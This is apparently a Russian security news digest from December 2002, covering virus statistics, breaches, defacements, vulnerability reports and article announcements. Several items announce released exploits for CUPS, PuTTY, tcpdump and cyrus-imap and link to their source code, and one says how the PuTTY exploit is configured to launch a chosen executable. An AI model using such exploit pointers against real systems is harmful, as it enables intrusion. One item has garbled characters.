31/12/2002 16:24 С НОВЫМ, 2003-М, ГОДОМ!
Команда UINC поздравляет всех посетителей нашего сайта с Новым Годом! Желаем всем нашим коллегам и единомышленникам счастья в наступающем году и дальнейшего повышения профессионального мастерства! Со своей же стороны мы постараемся приложить максимум сил и возможностей, чтобы в наступающем году наш сайт стал ещё лучше и качественнее. Удачи вам всем! Источник - МЫ
31/12/2002 11:40 Статья "Организация авторизированного доступа через прокси-сервер Squid".
Сайт opennet.ru представил статью Д. Новикова под названием "Организация авторизированного доступа через прокси-сервер Squid". В статье подробно описывается применение прокси-сервера squid для организации авторизированного доступа пользователей локальной сети к Интернет. Статья - http://www.artmagic.ru/a-papers/proxy.shtml
31/12/2002 10:09 Ответ на статью "Расхожие мифы о Windows и Linux".
Попалась на глаза довольно любопытная статья Алексей Любимова, фактически являющаяся ответом на появления статьи на одном Минском сервере некоего Германа Иванова под громким и амбициозным названием "Расхожие мифы о Windows и Linux". Вот вступления автора ответа: "Прочитав несколько статей под названием "Расхожие мифы о Windows и Linux", я нашел эти материалы весьма интересными. Автор этих опусов, Герман Иванов, не ограничился расписыванием в собственной некомпетенции, но смог в довольно небольшом объеме уложить максимум фобий и недоразумений, которые испытывает каждый впервые узнавший о линуксе пользователь. Вобщем-то если бы Германа не существовало, его стоило бы придумать. :) Пройти мимо такого подарка природы было непростительно и я взял на себя труд составить небольшой FAQ, где в качестве вопросов выступили реплики господина Иванова, а в качестве ответа немного общеизвестной в мире линукс информации". Хотелось бы поблагодарить Алексея (если он вдруг прочитает эти строки) за основательный и аргументированный ответ! Посетителям нашего сайта хотелось бы порекомендовать прочитать статью Алексея Любимова хотя бы для повышения собственной эрудиции. Ссылка на оригинал приведена в самом ответе (дабы иметь представление, о чём, собственно, идёт речь). Статья - http://www.atmsk.ru/download/win-lin.html
31/12/2002 9:29 Дефейс сайта RIAA.
Как сообщают некоторые компетентные источники из команды UINC, вчера было замечено, что некоторые неизвестные "хакеры" выполнили дефейс сайта Ассоциации Звукозаписывающей Индустрии США (Recording Industry Association of America), расположенного по адресу www.riaa.org. В частности, дефейсу была подвергнута титульная страница сайта, а также страницы PR_story.cfm?id=1120 и News.cfm. В настоящий момент, правда, всё восстановлено обратно. К сожалению, в данный момент неизвестна ссылка на зеркало дефейснутого сайта. Источник - собственная информация
31/12/2002 9:15 Так много дыр, так мало хаков.
Дмитрий Леонов, создатель сайта www.bugtraq.ru, отметил довольно любопытную статью на сайте WIRED. "Похоже, что эксперты, отыскивающие дырки в системах безопасности и публикующие эту информацию, гораздо более трудолюбивы, чем зловредные хакеры, желающие или способные эти дырки использовать." В сущности, как замечает Дмитрий, за весь 2002 год случилась всего пара глобальных эпидемий червей, активно использующих обнаруженные дыры. Те, кто в состоянии использовать, зачастую просто выше того, чтобы использовать свои знания "в антисоциальных целях". В то же время сам поиск уязвимостей давно уже превратился в самоцель и средство подтверждения статуса компаний, занимающихся безопасностью. Подробности - http://www.wired.com/news/infostructure/0,1377,56955,00.html
30/12/2002 20:37 Уходящий год оказался наихудшим по количеству вирусных инцидентов.
Компания Panda Software представила список наиболее "значительных" вирусов, доставлявших пользователям наибольшие неприятности вэуходящем году. Как следует изэпресс-релиза компании, 2002эгод оказался наихудшим вэистории компьютерных вирусов поэколичеству произошедших инцидентов. Заэпрошедшие двенадцать месяцев появилось множество вредоносных кодов наэлюбой вкус, аээпидемия вируса Klez.I, несмотря наэто,эчто неэдостигла масштабов Nimda, продолжает доставлять пользователям множество проблем. Компьютерные вирусы-2002 применяли самые разные технологии для проникновения на компьютеры пользователей. Основную массу вредоносных кодов составили почтовые черви, рассылающие себя по электронной почте по всем адресам контактных листов и адресных книг. Наибольшую опасность представляли те вирусы, которые использовали для своего запуска уязвимости других программ (такие, как Bride, Lentin, Klez.I). Появилось множество «троянов», большинство из которых предназначено для кражи конфиденциальной информации или представлению злоумышленникам доступа к компьютерам пользователей. Самым «стойким» вирусом стал Klez.I. Самым «опасным» вирусом года Panda Software называет L-вариант червя Opaserv. Самый «бессовестный» вирус в топ-списке «вредителей» — червь Prestige. Самый «совершенный» в техническом исполнении вирус — червь Bugbear, использующий ту же уязвимость, что и Klez.I. Подробности - http://www.cnews.ru/news...
30/12/2002 16:10 Известный хакер планирует "удар" по Интернету, если США нападут на Ирак.
Проживающий в Малайзии известный компьютерный хакер Владимор Чамлкович собирается запустить в Интернет новый разрушительный вирус, если США начнут войну с Ираком. Об этом сообщила вчера газета New York Post, с которой Чамлкович связался через электронную почту. 23-летний хакер считается одним из ведущих специалистов в мире по созданию компьютерных вирусов. В этом направлении он работает уже шесть лет. Именно ему, как считают, пользователи Интернета обязаны появлением в нем вирусов под названием "ОсамаЛаден", "Мехак", "Камил", "БлеБла Джей" и "Недал". В числе тех, кто пользуется услугами Чамлковича, есть люди, называющие себя сторонниками "Аль-Каиды". По утверждению New York Post, у него также хорошие связи с хакерами в России и Пакистане. В электронном послании Чамлковича говорится, что он нанесет своим новым супервирусом "удар" по глобальной компьютерной сети при первой же атаке американцев на Ирак потому, что "ненавидит войну и ненавидит, когда люди умирают". Как сообщает газета, ряд экспертов по компьютерной безопасности весьма серьезно воспринял угрозу хакера. По словам некоторых из них, его диверсия в Интернете может нанести серьезный урон мировой экономике. Однако другие специалисты считают что беспокоиться не стоит. По их мнению, негативный эффект от вирусов есть, но люди уже научились бороться с ними, передает ИТАР-ТАСС. Источник - http://www.securitylab.ru
30/12/2002 15:07 Статья "Установка Oracle8i 8.1.7.4 на FreeBSD шаг за шагом".
Как информирует сайт opennet.ru, Вячеслав Иванченко написал статью, которая содержит описание пошаговой установки Oracle8i для Linux (8.1.7.4) на FreeBSD. Статья - http://documents.dhs.net.ru/ru/articles/oracle/article.html
30/12/2002 14:43 Выход Sendmail 8.12.7.
29 декабря компания Sendmail, Inc. выпустила новую версию своего почтового сервера. Sendmail 8.12.7 содержит исправление для smrsh и поддерживает Berkeley DB 4.1. После известных событий (обнаружение версии sendmail, заражённой троянцем) разработчики рекомендуют тщательно проверять MD5-сумму скачанного файла перед началом сборки. Подробности - http://www.sendmail.org/8.12.7.html
30/12/2002 14:22 В Беларуси украли клиентскую базу мобильного оператора.
Если в России идет спор о вредности мобильной связи, то в Беларуси разразился скандал в связи с тем, что у одного из местных операторов "увели" базу клиентских телефонных номеров. Теперь эта конфиденциальная информация продается через Интернет. В ответ на участившиеся вопросы абонентов СП ООО "Мобильная цифровая связь" - торговая марка Velcom - дала свое официальное разъяснения по поводу сложившейся ситуации, сообщает сервер Tut.By. В заявлении говорится, что хищение части базы данных клиентов компании Velcom и размещение в Интернете явились результатом преступных действий со стороны лица или группы лиц. Источник - http://runet.ru/news/2094.html
30/12/2002 12:32 Эксплоит CUPS.
Ранее мы сообщали об уязвимости, обнаруженной в реализации CUPS (Common Unix Printing System), возникающей в функции memcpy() из-за некорректной проверки буфера. Эксплоит не заставил себя долго ждать - его выпустил 28 декабря Gabriel A. Maggiotti из Аргентины. Тестировался на ссистемах под управлением Red Hat 7.0, 7.3. Исходник - http://packetstorm.linuxsecurity.com/0212-exploits/shutdown_Cups.c
30/12/2002 12:12 Эксплоит для SSH-клиента putty.
Ребята из испанской группы I-PROYECTOS Division Seguridad ( www.iproyectos.com ) опубликовали эксплоит, который "использует" уязвимость в реализациях SSH v.2 многих производителей (о ней сообщила 16 декабря Rapid 7.Inc). Эксплоит представляет собой "фальшивый" (fake) SSH-сервер, который может быть применён против клиента putty 0.52, запущенного на ОС WinXP, Win2K. Как указано в описании эксплоита, в исходном коде необходимо переопределить значение URL .exe-файла, который необходимо запустить, а также определять переменную препроцессора в случае атаки на клиента под управлением WinXP. Исходник - http://packetstorm.linuxsecurity.com/0212-exploits/IP-putty.c
30/12/2002 11:15 В Японии отказываются от применения беспроводных сетей.
Как сообщает японская газета AsahiShimbun Агентство по метеорологии Японии и Правительство Японии (Tokyo metropolitan government) отказались от использования беспроводных сетей (WLAN) на прошлой неделе после того, как было выяснено, что сети этих правительственных учреждений оказались полностью открытыми для злоумышленников, которые (при наличии соотв. оборудования и софта) могли бы без особых проблем получить доступ к этим сетям. Подобная "особенность" правительственных беспроводных сетей была обнаружена компьютерным консультантом префектуры Фукуи Kazuo Tanabe. В процессе изучения работы сетей им было обнаружено, что данные, передаваемые между различными офисами учреждений, соединённых между собой посредством WLAN, могут быть перехывачены с использованием программ, свобоно распространяемых в Интернете. Подробности - http://www.asahi.com/english/national/K2002122600287.html
29/12/2002 20:10 Российский Интернет будет самым беззащитным.
Администрация США представила Национальную стратегию безопасности киберпространства (National Strategy to Secure Cyberspace), которую в начале 2003 года рассмотрит конгресс. Поскольку мировая информационная паутина на самом деле является американской, этот документ будет определять всю интернет-жизнь. Пока неизвестно, сколько денег будет потрачено на этот проект, но то, что недостатка в финансировании не будет, очевидно всем. В России на средства кибербезопасности в 2002 году было выделено около 2,5% общего финансирования программы "Электронная Россия". В бюджете программы на 2003 год на эти цели будет потрачено менее процента всех средств. Ответственное за безопасность коммуникаций Федеральное агентство правительственной связи и информации (ФАПСИ) считает, что нужно тратить не менее 20% - столько предусмотрено в аналогичных "Электронной России" программах. Россия, информационная отрасль которой растет невиданными темпами, не может похвастаться обилием средств, направляемых на информационную безопасность. Подводя итоги выполнения программы "Электронная Россия", заместитель гендиректора ФАПСИ Владимир Хрупов отметил, что пока "не удалось создать единый механизм финансирования работ по информационной безопасности". По оценке ФАПСИ, на анализ виртуальных рисков и создание средств информационной безопасности в 2003 году нужно было бы потратить минимум 331 млн рублей, однако в программе "Электронная Россия" выделено только 9,5 млн. По сведениям "Известий", сейчас средств хватает лишь на анализ западного программного обеспечения на наличие в нем, как говорят в ФАПСИ, "недокументированных функций", иными словами, шпионящих средств. Видимо, главным способом борьбы с кибератаками и вирусами будет хорошее дедовское средство - воздержание. Тем более что в правительственных структурах до сих пор существует инструкция, согласно которой компьютеры, содержащие служебную информацию, вообще не должны быть подключены к Интернету. Подробнее - http://www.rambler.ru/db/news/msg.html?mid=3087002
29/12/2002 19:16 Статья " Русификация RedHat Linux 8.0".
Cтатья "Русификация RedHat Linux 8.0", автором которой является Королев Тимофей, размещена на сайте www.linuxshop.ru. Посвящена, собственно, руссификации вышедшей недавно версии дистрибутива RedHat с "прикручиванием" локали UTF-8. Статья - http://linuxshop.ru/lib/?cid=19&id=119
29/12/2002 18:38 Межсайтовый скриптинг в Internet Explorer.
Обнаруженная уязвимость в IE позволяет удаленному атакующему вставить произвольный код сценария в URL flash-объекта, который будет автоматически выполнен при загрузке злонамеренной Web страницы, в контексте уязвимого сайта. Уязвимость может использоваться для кражи чувствительных данных, хранящихся в куки. Уязвимость обнаружена в Internet Explorer 5.0-6.0 Подробности - http://www.securitylab.ru/?ID=35122
29/12/2002 18:19 Уязвимость в PHP.
David F. Skoll из Roaring Penguin Software Inc. сообщает о наличии уязвимости в популярном языке скриптов PHP. При специальным образом сформированном вводе пользователя, обращающегося к встроенной функции wordwrap(), может произойти переполнение выделенного буфера с последующей перезаписью кучи (heap). Эксплоит, как утверждается довольно сложен в реализации, однако не невозможен. Уязвимоть обнаружена в версиях PHP больше 4.1.2, но меньше недавно выпущенной версии 4.3.0. Администраторам Вэб-сайтов, на которых применяется PHP рекомендуется обновиться до выпущенной версии 4.3.0. Более подробно - http://bugs.php.net/bug.php?id=20927
29/12/2002 17:32 Выход журнала PHRACK #60.
PHRACK Inc. анонсировала выход очередного, 60-го, номера электронного журнала хакерского андэграунда PHRACK. Первый номер журнала вышел 17 ноября 1985 г. В новом номере представлены следующие статьи и разделы: Linenoise, Toolz Armory (новый раздел, представленный Packet Storm), Smashing The Kernel Stack For Fun And Profit, Burning the bridge: Cisco IOS exploits, Basic Integer Overflows и другие. Рекомендуем ознакомиться, возможно, Вы узнаете для себя что-то новое (а возможно, и очень много нового :)). Журнал - http://www.phrack.org/
29/12/2002 17:16 В 2002 году в программах Microsoft найдено 65 брешей для хакеров.
В течение 2002 года в продуктах компании Microsoft было обнаружено 65 изъянов, серьезно влияющих на уровень безопасности компьютеров, сообщает сайт Vnunet.com. В последнюю неделю декабря корпорация Билла Гейтса выпустила обновленные версии операционных систем Windows 2000, Me, 98, 98 SE и NT 4, ликвидировав все ранее обнаруженные в них бреши. По словам аналитиков, частое обнаружение недостатков, влияющих на безопасность компьютеров в значительной степени подрывает доверие потребителей, однако избежать таких ошибок невозможно. "Это то, что необходимо признать как факт. От этого никуда не деться - в программном обеспечении есть бреши", - сказала представительница маркетинговой компании Intelellect Беатрис Роджерс. Руководитель онлайновой платежной системы WorldPay Фил Баттисон полагает, что объявления о об обнаружении брешей в программном обеспечении вряд ли может повысить степень доверия потребителей: "Загрузке патчей для Windows XP и Internet Explorer я посвятил целый уикенд и прекрасно знаю, что это такое". С мнением Баттисона согласен и руководитель отдела информационной безопасности британского представительства Microsoft Стюарт Окин. Источник - http://www.lenta.ru
29/12/2002 16:33 В Интернете обнаружен "динамический троянский конь".
Специалисты компании Internet Security Systems (ISS) обнаружили новый вирус троянского типа - DTHN, сообщает сайт tecchanhel.de. Название DTHN является аббреватурой от Dynamic Trojan Horse Network ("Динамический сетевой троянский конь"). Вирус написан в Германии и впервые появился в сети еще в октябре, однако тогда DTHN распространялся в сети всего несколько дней. "Динамический сетевой троянский конь" распространяется как по электронной почте, так и по сетям, использующим протокол NetBIOS. DTHN является утилитой скрытого администрирования и может вызывать повреждение системных файлов, а также организовывать DDOS-атаки. Подробнее - http://de.news.yahoo.com/021228/51/34v13.html
29/12/2002 16:11 Самого опасного хакера США снова пустят в интернет.
"Один из самых опасных компьютерных преступников в истории США" Кевин Митник в ближайшее время снова сможет пользоваться интернетом, сообщает CNN. По итогам длительных судебных разбирательств Митник сумел вернуть себе лицензию для выхода в радиоэфир, а в январе получит доступ и ко всемирной компьютерной сети. 39-летний Митник, проживающий в штате Калифорния, провел около пяти лет в федеральной тюрьме за воровство программного обеспечения и незаконное получение доступа к базам данных компаний Motorola, Novell, Nokia, Sun Microsystems, а также университета штата Южная Каролина. Общий убыток пострадавших от деятельности Митника компаний составил несколько десятков миллионов долларов. Митник был освобожден в январе 2000 года, однако, согласно условиям надзора, до 20 января 2003 года ему было запрещено пользоваться компьютерами, программным обеспечением, модемами и другими средствами доступа в интернет. Кроме того, власти ограничили свободу передвижения бывшего хакера и лишили его возможности занимать ряд должностей. В 2002 году Митнику было разрешено пользоваться мобильным телефоном и компьютером без доступа в интернет. Недавно бывший хакер заявил о намерении открыть компанию, специализирующуюся на компьютерной безопасности. Он надеется приступить к работе сразу по окончании срока надзора. Подробности - http://www.cnn.com/2002/TECH/12/26/fcc.hacker.ap/index.html
28/12/2002 20:38 Статья "Введение в распределенные DoS атаки".
Сайт securitylab.ru порадовал очередным качественным переводом Михаила Разумова. Оригинальная статья Мэтта Танаса под названием " Barbarians at the Gate: An Introduction to Distributed Denial of Service Attacks" была опубликована 3 декабря сего года на сайте securityfocus.com. Статья - http://www.securitylab.ru/?ID=35099
28/12/2002 18:32 Статья "Уязвимость корпоративной почты".
На сайте neworder.box.sk опубликована довольно любопытная статья некоего Victor M. ( GRAMMARSoft@root-core.com ) под названием "Corporate Email Insecurities (Another article on email exploits)", описывающая интересный метод взлома корпоративного почтового сервера под управлением MS Outlook. Настоятельно рекомендуем ознакомиться. Статья - http://neworder.box.sk/newsread.php?newsid=6814
28/12/2002 12:05 Хит-парад ошибок веб-дизайна за 2002 год.
В конце декабря один из наиболее авторитетных специалистов по эргономике веб- сайтов Якоб Нильсен опубликовал на своей домашней странице очередной хит- парад наиболее распространенных ошибок в сайтостроении. Нильсен серьезно занимается проблемами web и, в частности, эргономики сайтов, начиная с 1994 года. Свой первый хит-парад ошибок он опубликовал еще в 1996 г., а во второй раз подобный список увидел свет в 1999 г. Выдержав такой же трехлетний интервал, Нильсен опубликовал и третий хит-парад ошибок веб-дизайна. Выглядит он следующим образом: Отсутствие цен на коммерческих сайтах класса business-to-business, а также в обычных электронных магазинах на страницах товарных категорий и результатов поиска; Малая гибкость поиска по сайту; по мнению Нильсена, поиск должен корректно работать с различными грамматическими формами слов и иметь достаточно современные алгоритмы сортировки результатов; Использование горизонтальных полос прокрутки, особенно в окнах стандартного размера Использование шрифтов фиксированного размера (особенно мелкого), который нельзя изменить соответствующей командой браузера и т.д. Подробнее - http://useit.com/alertbox/20021223.html
28/12/2002 11:55 Статьи пилотного номера журнала "Системный администратор" доступны в online.
На сайте "Системный администратор" опубликованы наиболее интересные статьи (в PDF формате) первого выпуска: Установка и настройка коммутаторов cisco catalyst серий 2900xl и 3500; Эффективное использование памяти в Perl при работе с большими строками; Работа с текстом,или философия Perl; Java -магия отражений; Миграция с Windows на Linux; Python в администрировании сервера; ColdFusion или, возможно, лучшее решение для создания динамических сайтов; Анализатор сетевого трафика; Сканер портов:пример реализации; CommerceML -стандарт обмена коммерческой информацией в формате XML. Подробности - http://www.opennet.ru/opennews/art.shtml?num=1914
28/12/2002 11:52 Советы по работе с DNS сервером BIND.
Вышла вторая часть статьи "Cooking with DNS & BIND", которая содержит советы в виде проблема/решение по использованию DNS сервера BIND. Подробности и ссылки - http://www.opennet.ru/opennews/art.shtml?num=1657
28/12/2002 11:42 Интеграция алгоритмов защиты в Linux.
Компания ЛАН Крипто совместно с компанией ALT Linux завершили интеграцию алгоритмов защиты информации (Wicker'98, NUSH, LANS) в библиотеку GNUPG и ядро операционной системы Linux. Подробнее - http://www.altlinux.ru/index.php?module=press&action=showfull&newsid=55
28/12/2002 11:14 "Время жизни" дистрибутивов от RedHat - один год.
Начиная с версии 8.0, все дистрибутивы от RedHat будут поддерживаться (с выпуском security и других апдейтов) всего на протяжении одного года (правда с оговоркой, что для популярных релизов этот срок может быть продлен). Так же для всех ранее выпущенных, и все ещще поддержиывемых дистрибутивов установлено время окончания поддержки: для RH 7.0 и более ранних до 31го марта 2003го года, для RH 7.1-8.0 до 31го декабря 2003го года. Так же об]явлено о прекращении поддержки RedHat powertools, так же Alpha и SPARC архитектур. Взято из новостей сайта linux.org.ru. Подробности - http://www.redhat.com/apps/support/errata/
27/12/2002 12:54 Sendo обвиняет Microsoft в грязных приемах.
В судебном иске, поданном в конце прошлой недели, британский производитель мобильных телефонов Sendo обвиняет Microsoft в использовании более мелкой компании в качестве вспомогательного средства для выхода на лакомый рынок. Британская компания утверждает, что Microsoft воспользовалась опытом Sendo в области производства мобильных телефонов, а затем бросила ее на произвол судьбы. Иск приоткрывает завесу над закулисными баталиями между поставщиками ПО, производителями мобильных телефонов и сетевыми операторами за место на зарождающемся рынке так называемых смартфонов. А бороться есть за что: годовой объем продаж в индустрии мобильных телефонов оценивается в 400 млн устройств. В своем иске Sendo утверждает: Microsoft внушила компании ложное чувство защищенности, уверяя, что Sendo, когда ее смартфоны на базе Windows Powered Smartphone 2002 выйдут на рынок, станет главным партнером Microsoft по аппаратуре. Однако, как только смартфоны Microsoft вышли на рынок, Sendo оказалась на обочине. «Тайный план Microsoft заключался в том, чтобы выкачать из маленькой компании имеющуюся у нее информацию, технический опыт, маркетинговые наработки, существующих и потенциальных заказчиков, — говорится в иске. — Microsoft втерлась в доверие к Sendo посредством ложных обещаний, что Sendo станет ее партнером по выходу на рынок». Подробнее - http://www.zdnet.ru/?ID=293840
27/12/2002 12:35 Korea Telecom защитит пользователей от "клавиaтурных шпионов"
Крупнейший южнокорейский оператор проводной связи Korea Telecom открыл у себя онлайновую "службу компьютерной безопасности". Служба Megapass PC Security позволит защитить пользователя интернета от "клавиатурных шпионов" посредством кодирования значений клавиш специальными цифровыми кодами, отличными от стандартных, для передачи по интернету через провайдера, где эти значения преобразуются в реальные. Поскольку конфиденциальная информация хранится в шифрованном виде, самый легкий способ ее кражи - установка перехватчика нажатий клавиш, который позволяет хакеру получить все пароли и информацию без необходимости заниматься расшифровкой. В пакет ПО также войдут межсетевой экран и антивирусная программа. Подписка на сервис обойдется пользователю в 1000 вон (около $4) ежемесячно. Источник - http://www.hankooki.com
27/12/2002 11:36 Администрация президента США: система слежки за информационными потоками не нарушит конфиденциальности пользователей интернета.
После заявлений администрации президента США Буша о намерении создать систему тотального контроля за информационными потоками в интернете крупные провайдеры и разработчики ПО, не говоря уже о защитниках прав на неприкосновенность частной информации, выразили свою озабоченность. В связи с этим представители администрации решили пояснить, о чем идет речь. "Центр раннего оповещения", включенный в "Национальную стратегию защиты киберпространства", по заявлению советника президента из департамента внутренней безопасности Ричарда Кларкa (Richard Clarke), не ставит перед собой целью сбор информации о том, что пользователи делают в Сети. "Эта система раннего оповещения, если компании согласятся в ней участвовать, будет использовать только уже обработанную информацию о положении дел в интернете", - сказал Кларк. Таким образом, правительство не будет знать о том, какие сайты посещает конкретный человек и какие письма пишет. Однако подробности по- прежнему неизвестны. Источник - http://www.cnews.ru/
27/12/2002 09:35 Хакерская атака на сайт Afisha.ru.
16 декабря была предпринята масштабная DoS-атака на сайт Afisha.ru, специализирующийся на публикации информации о городских развлечениях - анонсов театров, кинозалов, концертов и т.д. Симптомы атаки проявились в виде увеличения количества запросов на передачу HTML-кода страниц Afisha.ru - до 200 запросов в секунду, при одновременном количестве посетителей в двести человек. За сутки количество загрузок титульной страницы достигло нескольких миллионов, то есть нагрузки на сервера Afisha.ru были сопоставимы с нагрузками на серверы крупных порталов. В ночное время количество запросов несколько уменьшалось, хотя уровень числа запросов был аномально высоким - до пятнадцати в секунду. К счастью, серверы Afisha.ru выдержали повышенную нагрузку и продолжали работать в штатном режиме. При исследовании логов сервера выяснилось, что с всплески количества запросов происходят с большого количества различных IP-адресов. Продолжительность таких всплесков также различна: от нескольких десятков минут до нескольких часов. А с одного IP-адреса в первый день атаки было выкачено около гигабайта данных. По мнению специалистов Afisha.ru и хостинг-центра РБК, где расположен сайт, своим возникновением атака обязана активизации червя, написанного неизвестными хакерами. При наличии соединения компьютера с интернетом червь обращается к главной странице Afisha.ru со средней частотой около десяти запросов в секунду. Информация об атаке направлена всем основным российским разработчикам антивирусного ПО. Источник - http://www.compulenta.ru
26/12/2002 13:27 Эксплоит для удалённого взлома TCPDUMP.
Выложен исходник, удалённо проламывающий сервера FreeBSD с запущенным сниффером tcpdump. Исходник - http://packetstorm.linuxsecurity.com/0212-exploits/tcpdumpFBSD363.c
26/12/2002 13:19 Эксплоит для cyrus-imap.
Выложен исходник эксплоита, использующий уязвимость в cyrus-imap. Позволяет локально получить полномочия пользователя CYRUS. Тестировано на связке slack linux 8.0: cyrus-imap 2.1.10 , glibc-2.2.3 ,kernel 2.4.19. Исходник - http://packetstorm.linuxsecurity.com/0212-exploits/cy.c
26/12/2002 12:57 Пять лет тюрьмы за доступ в Интернет.
Двое оперативников - сотрудники управления "К". Их цель - взять с поличным компьютерного взломщика. О том, что хакер незаконно вошел в Сеть, сотрудникам милиции сообщил Интернет-провайдер. Для 17-летнего Алексея постановление об обыске стало полной неожиданностью. Во время обыска оперативники нашли 4 системных блока, три модема и большое количество компьютерных дисков. С помощью нескольких вирусных программ, которых хакеры называют "троянскими конями", Алексей взламывал файлы, где хранились пароли доступа к Интернету. Похищенные пароли доступа Алексей выставлял на Интернет-аукционе. Когда покупатель находился, взломщик встречался с ним и получал за каждый незаконный доступ по 20 долларов. Точно по такой же схеме действовал и студент одного из московских вузов 18-летний Евгений. Сначала похищенным доступом в Интернет пользовались его родственники и знакомые, а потом он стал выставлять пароли на продажу. Оперативники установили, что только у одного Интернет-провайдера он похитил около 300 паролей. Подробности - http://www.securitylab.ru/?ID=35098
26/12/2002 12:31 Неприятная уязвимость IExplorer.
Эксплорер не перестает удивлять. На этот раз в нем обнаружилась интересная особенность, дающая возможность владельцу сайта копировать содержание Windows Clipboard заходящих к нему клиентов. Естественно, без ведома последних. Взято с www.bugtraq.ru. Подробности - http://www.securitynewsportal.com/cgi-bin/cgi-script/csNews...
26/12/2002 12:09 Adobe и Microsoft схлестнутся на документах?
Adobe, распространившая свыше 500 млн копий своего ПО, надеется, что так будет и дальше. Acrobat превращает любой документ в файл PDF (Portable Document Format), который можно прочесть или распечатать на любом устройстве с сохранением оригинального форматирования и в котором весь текст защищен от модификации. А бесплатная версия Acrobat Reader позволяет владельцам ПК просматривать и распечатывать документы PDF. Теперь Adobe планирует расширить Portable Document Format за пределы Acrobat Reader, в ближайшие месяцы превратив его в многоцелевой бизнес-инструментарий. Тем временем Microsoft планирует выпустить ПО, посягающее на рынок Adobe. В начале этого года Microsoft объявила о планах выпуска XDocs, расширения для своего ПО Office, которое позволит сотрудникам компаний легко создавать эталонные онлайновые формы. Объявленный вначале могильщиком PDF, этот продукт поутратил блеска в глазах аналитиков. Теперь они рассматривают XDocs в качестве потенциального конкурента лишь для части бизнеса Adobe. Кроме того, в прошлом месяце на презентации ПО Tablet PC Microsoft намекнула, во что могут вылиться другие ее планы. Билл Гейтс сказал, что будущие приложения Tablet PC могут включать ePeriodicals, XML-расширение программы Reader, которое позволит издателям создавать искусно отформатированные версии электронных журналов. Дата выпуска ePeriodicals не называлась. Подробности - http://zdnet.com.com/2100-1104-978607.html
26/12/2002 11:46 ФБР тратит впустую сотни миллионов долларов на информационные технологии.
Проверка, проведенная Ревизионным управлением американского министерства юстиции (Justice Dept.'s Office of Inspector General) в ФБР, показала, что эта спецслужба продолжает неэффективно расходовать значительные средства, выделенные в бюджете на совершенствование ее информационной инфраструктуры. "ФБР тратит сотни миллионов долларов на ИТ-проекты без достаточных гарантий, что средства будут реализованы должным образом", - говорится в отчете. Например, сильно выбивается из графика выполнение масштабной программы Trilogy по замене компьютерных систем ФБР. Несмотря на получение дополнительных 78 млн. долларов, летом ФБР так и не завершила переоснащение своих 56 региональных управлений (field offices). Теперь в ФБР заявляют, что только по аппаратной части Trilogy работа будет завершена не ранее марта следующего года. В заключении ревизоры написали, что в ФБР вообще отсутствуют какие-либо эффективные структуры по контролю за исполнением ИТ-проектов и управлению ИТ-инвестициями. Источник - http://www.compulenta.ru
26/12/2002 10:25 Вышел "Пакет Обновлений 5" для "Антивируса Касперского".
"Лаборатория Касперского" сообщила о выходе "Пакета Обновлений 5" для следующих продуктов семейства "Антивирус Касперского" (русская и английская версии): Антивирус Касперского Personal (версии 4.0.6.0, 4.0.7.0, 4.0.8.0), Антивирус Касперского Personal Pro (версии 4.0.6.0, 4.0.7.0, 4.0.8.0), Антивирус Касперского Business Optimal для рабочих станций Windows (версии 4.0.5.0, 4.0.7.0, 4.0.8.0), Антивирус Касперского Business Optimal для серверов Windows (версии 4.0.5.0, 4.0.7.0, 4.0.8.0), Данный пакет содержит следующие изменения и дополнения. Модуль: Антивирус Касперского Scanner (Версия 4.0.5.37 от 24.10.2002) Исправлены ошибки, связанные с обработкой сканером объектов, исполняемых на старте системы. Исправлена некорректная работа сканера с профилем пользователя под Win9x. Модуль: Антивирус Касперского Monitor (Версия 4.0.5.40 от 24.10.2002) Исправленa ошибка работы монитора с многотомными RAR-архивами. Исправлена проблема доступа к сетевым дискам. Пакет Обновлений 5 включает все изменения, вошедшие в ранее выпущенные пакеты обновлений. Антивирус Касперского Business Optimal для рабочих станций Windows и Антивирус Касперского для серверов Windows могут быть обновлены удаленно, с помощью утилиты централизованного управления антивирусной защитой Kaspersky Administration Kit. Cкачать - http://www.kaspersky.ru/download.html?chapter=762769&type=p
25/12/2002 15:20 Чемпионат по виртуальным автогонкам Формула-1 на Flash.
Моторные масла Elf теперь можно выиграть в Интернете. И это уже не конкурс "на удачу", а справедливое состязание - игра, представляющая собой интерактивный чемпионат по виртуальным автогонкам Формула-1 на Flash. Компания "МотоСпортСервис", официальный дистрибьютор TotalFinElf в Северо-Западном регионе, становится спонсором российского Интернет проекта посвященного Формуле-1 - www.F1game.ru. Сайт представляет собой уникальную на сегодняшний день аркадную игру на Flash, на базе которой и организован интерактивный чемпионат по автогонкам. В ходе виртуального чемпионата сильнейшие будут награждаться призами - это высококачественные моторные масла (www.mssoil.ru/elf) и сувенирная продукция Elf. Состязание проходит "нон-стопом" (с февраля 2002 года состоялось два первенства), а его участником может стать каждый! Сайт проекта - http://www.F1game.ru
25/12/2002 15:17 Неприятная уязвимость IExplorer.
Эксплорер не перестает удивлять. На этот раз в нем обнаружилась интересная особенность, дающая возможность владельцу сайта копировать содержание Windows Clipboard заходящих к нему клиентов. Естественно, без ведома последних. Взято с сайта Дмитрия Леонова. Подробности - http://www.securitynewsportal.com/...
25/12/2002 14:41 United Linux 1.0.
Исходные коды United Linux 1.0., как и было обещано, доступны для скачивания. Скачать - ftp://ftp.gwdg.de/pub/linux/suse/ftp.suse.com/unitedlinux/1.0/src
25/12/2002 14:31 "Касперский" и "Инфосистемы Джет" защитят от вирусов Министерство РФ по налогам и сборам.
Российские разработчики систем информационной безопасности "Лаборатория Касперского" и компания "Инфосистемы Джет" сообщили сегодня о начале совместного проекта по поставке и внедрению комплекса защиты от вирусов для информационно-вычислительных сетей Министерства Российской Федерации по налогам и сборам. Антивирус Касперского будет установлен на компьютерах Центрального Аппарата МНС и управлений МНС Московской области общим числом 6200 рабочих мест. Внедрением системы защиты от будет заниматься компания "Инфосистемы Джет", официальный партнер "Лаборатории Касперского". Специалисты "Лаборатории" будут оказывать содействие в непосредственной инсталляции, развертывании и поддержке средств антивирусной защиты в качестве подрядчика. Источник - http://www.avp.ru
24/12/2002 12:35 Статья "Построение Вэб-сервера Apache с использованием mod_perl и mod_ssl"
Дэвид Уиллер (David E. Wheeler) на сайте macdevcenter.com опубликовал статью с оригинальным названием "Build Your Own Apache Server with mod_perl and mod_ssl", которая посвящена описанию построения Вэб-сервера Apache с использованием модулей mod_perl и mod_ssl в операционной системе Mac OS X. Статья - http://www.macdevcenter.com/pub/a/mac/2002/12/18/apache_modssl.html
24/12/2002 12:17 Вопросы и ответы по FreeBSD.
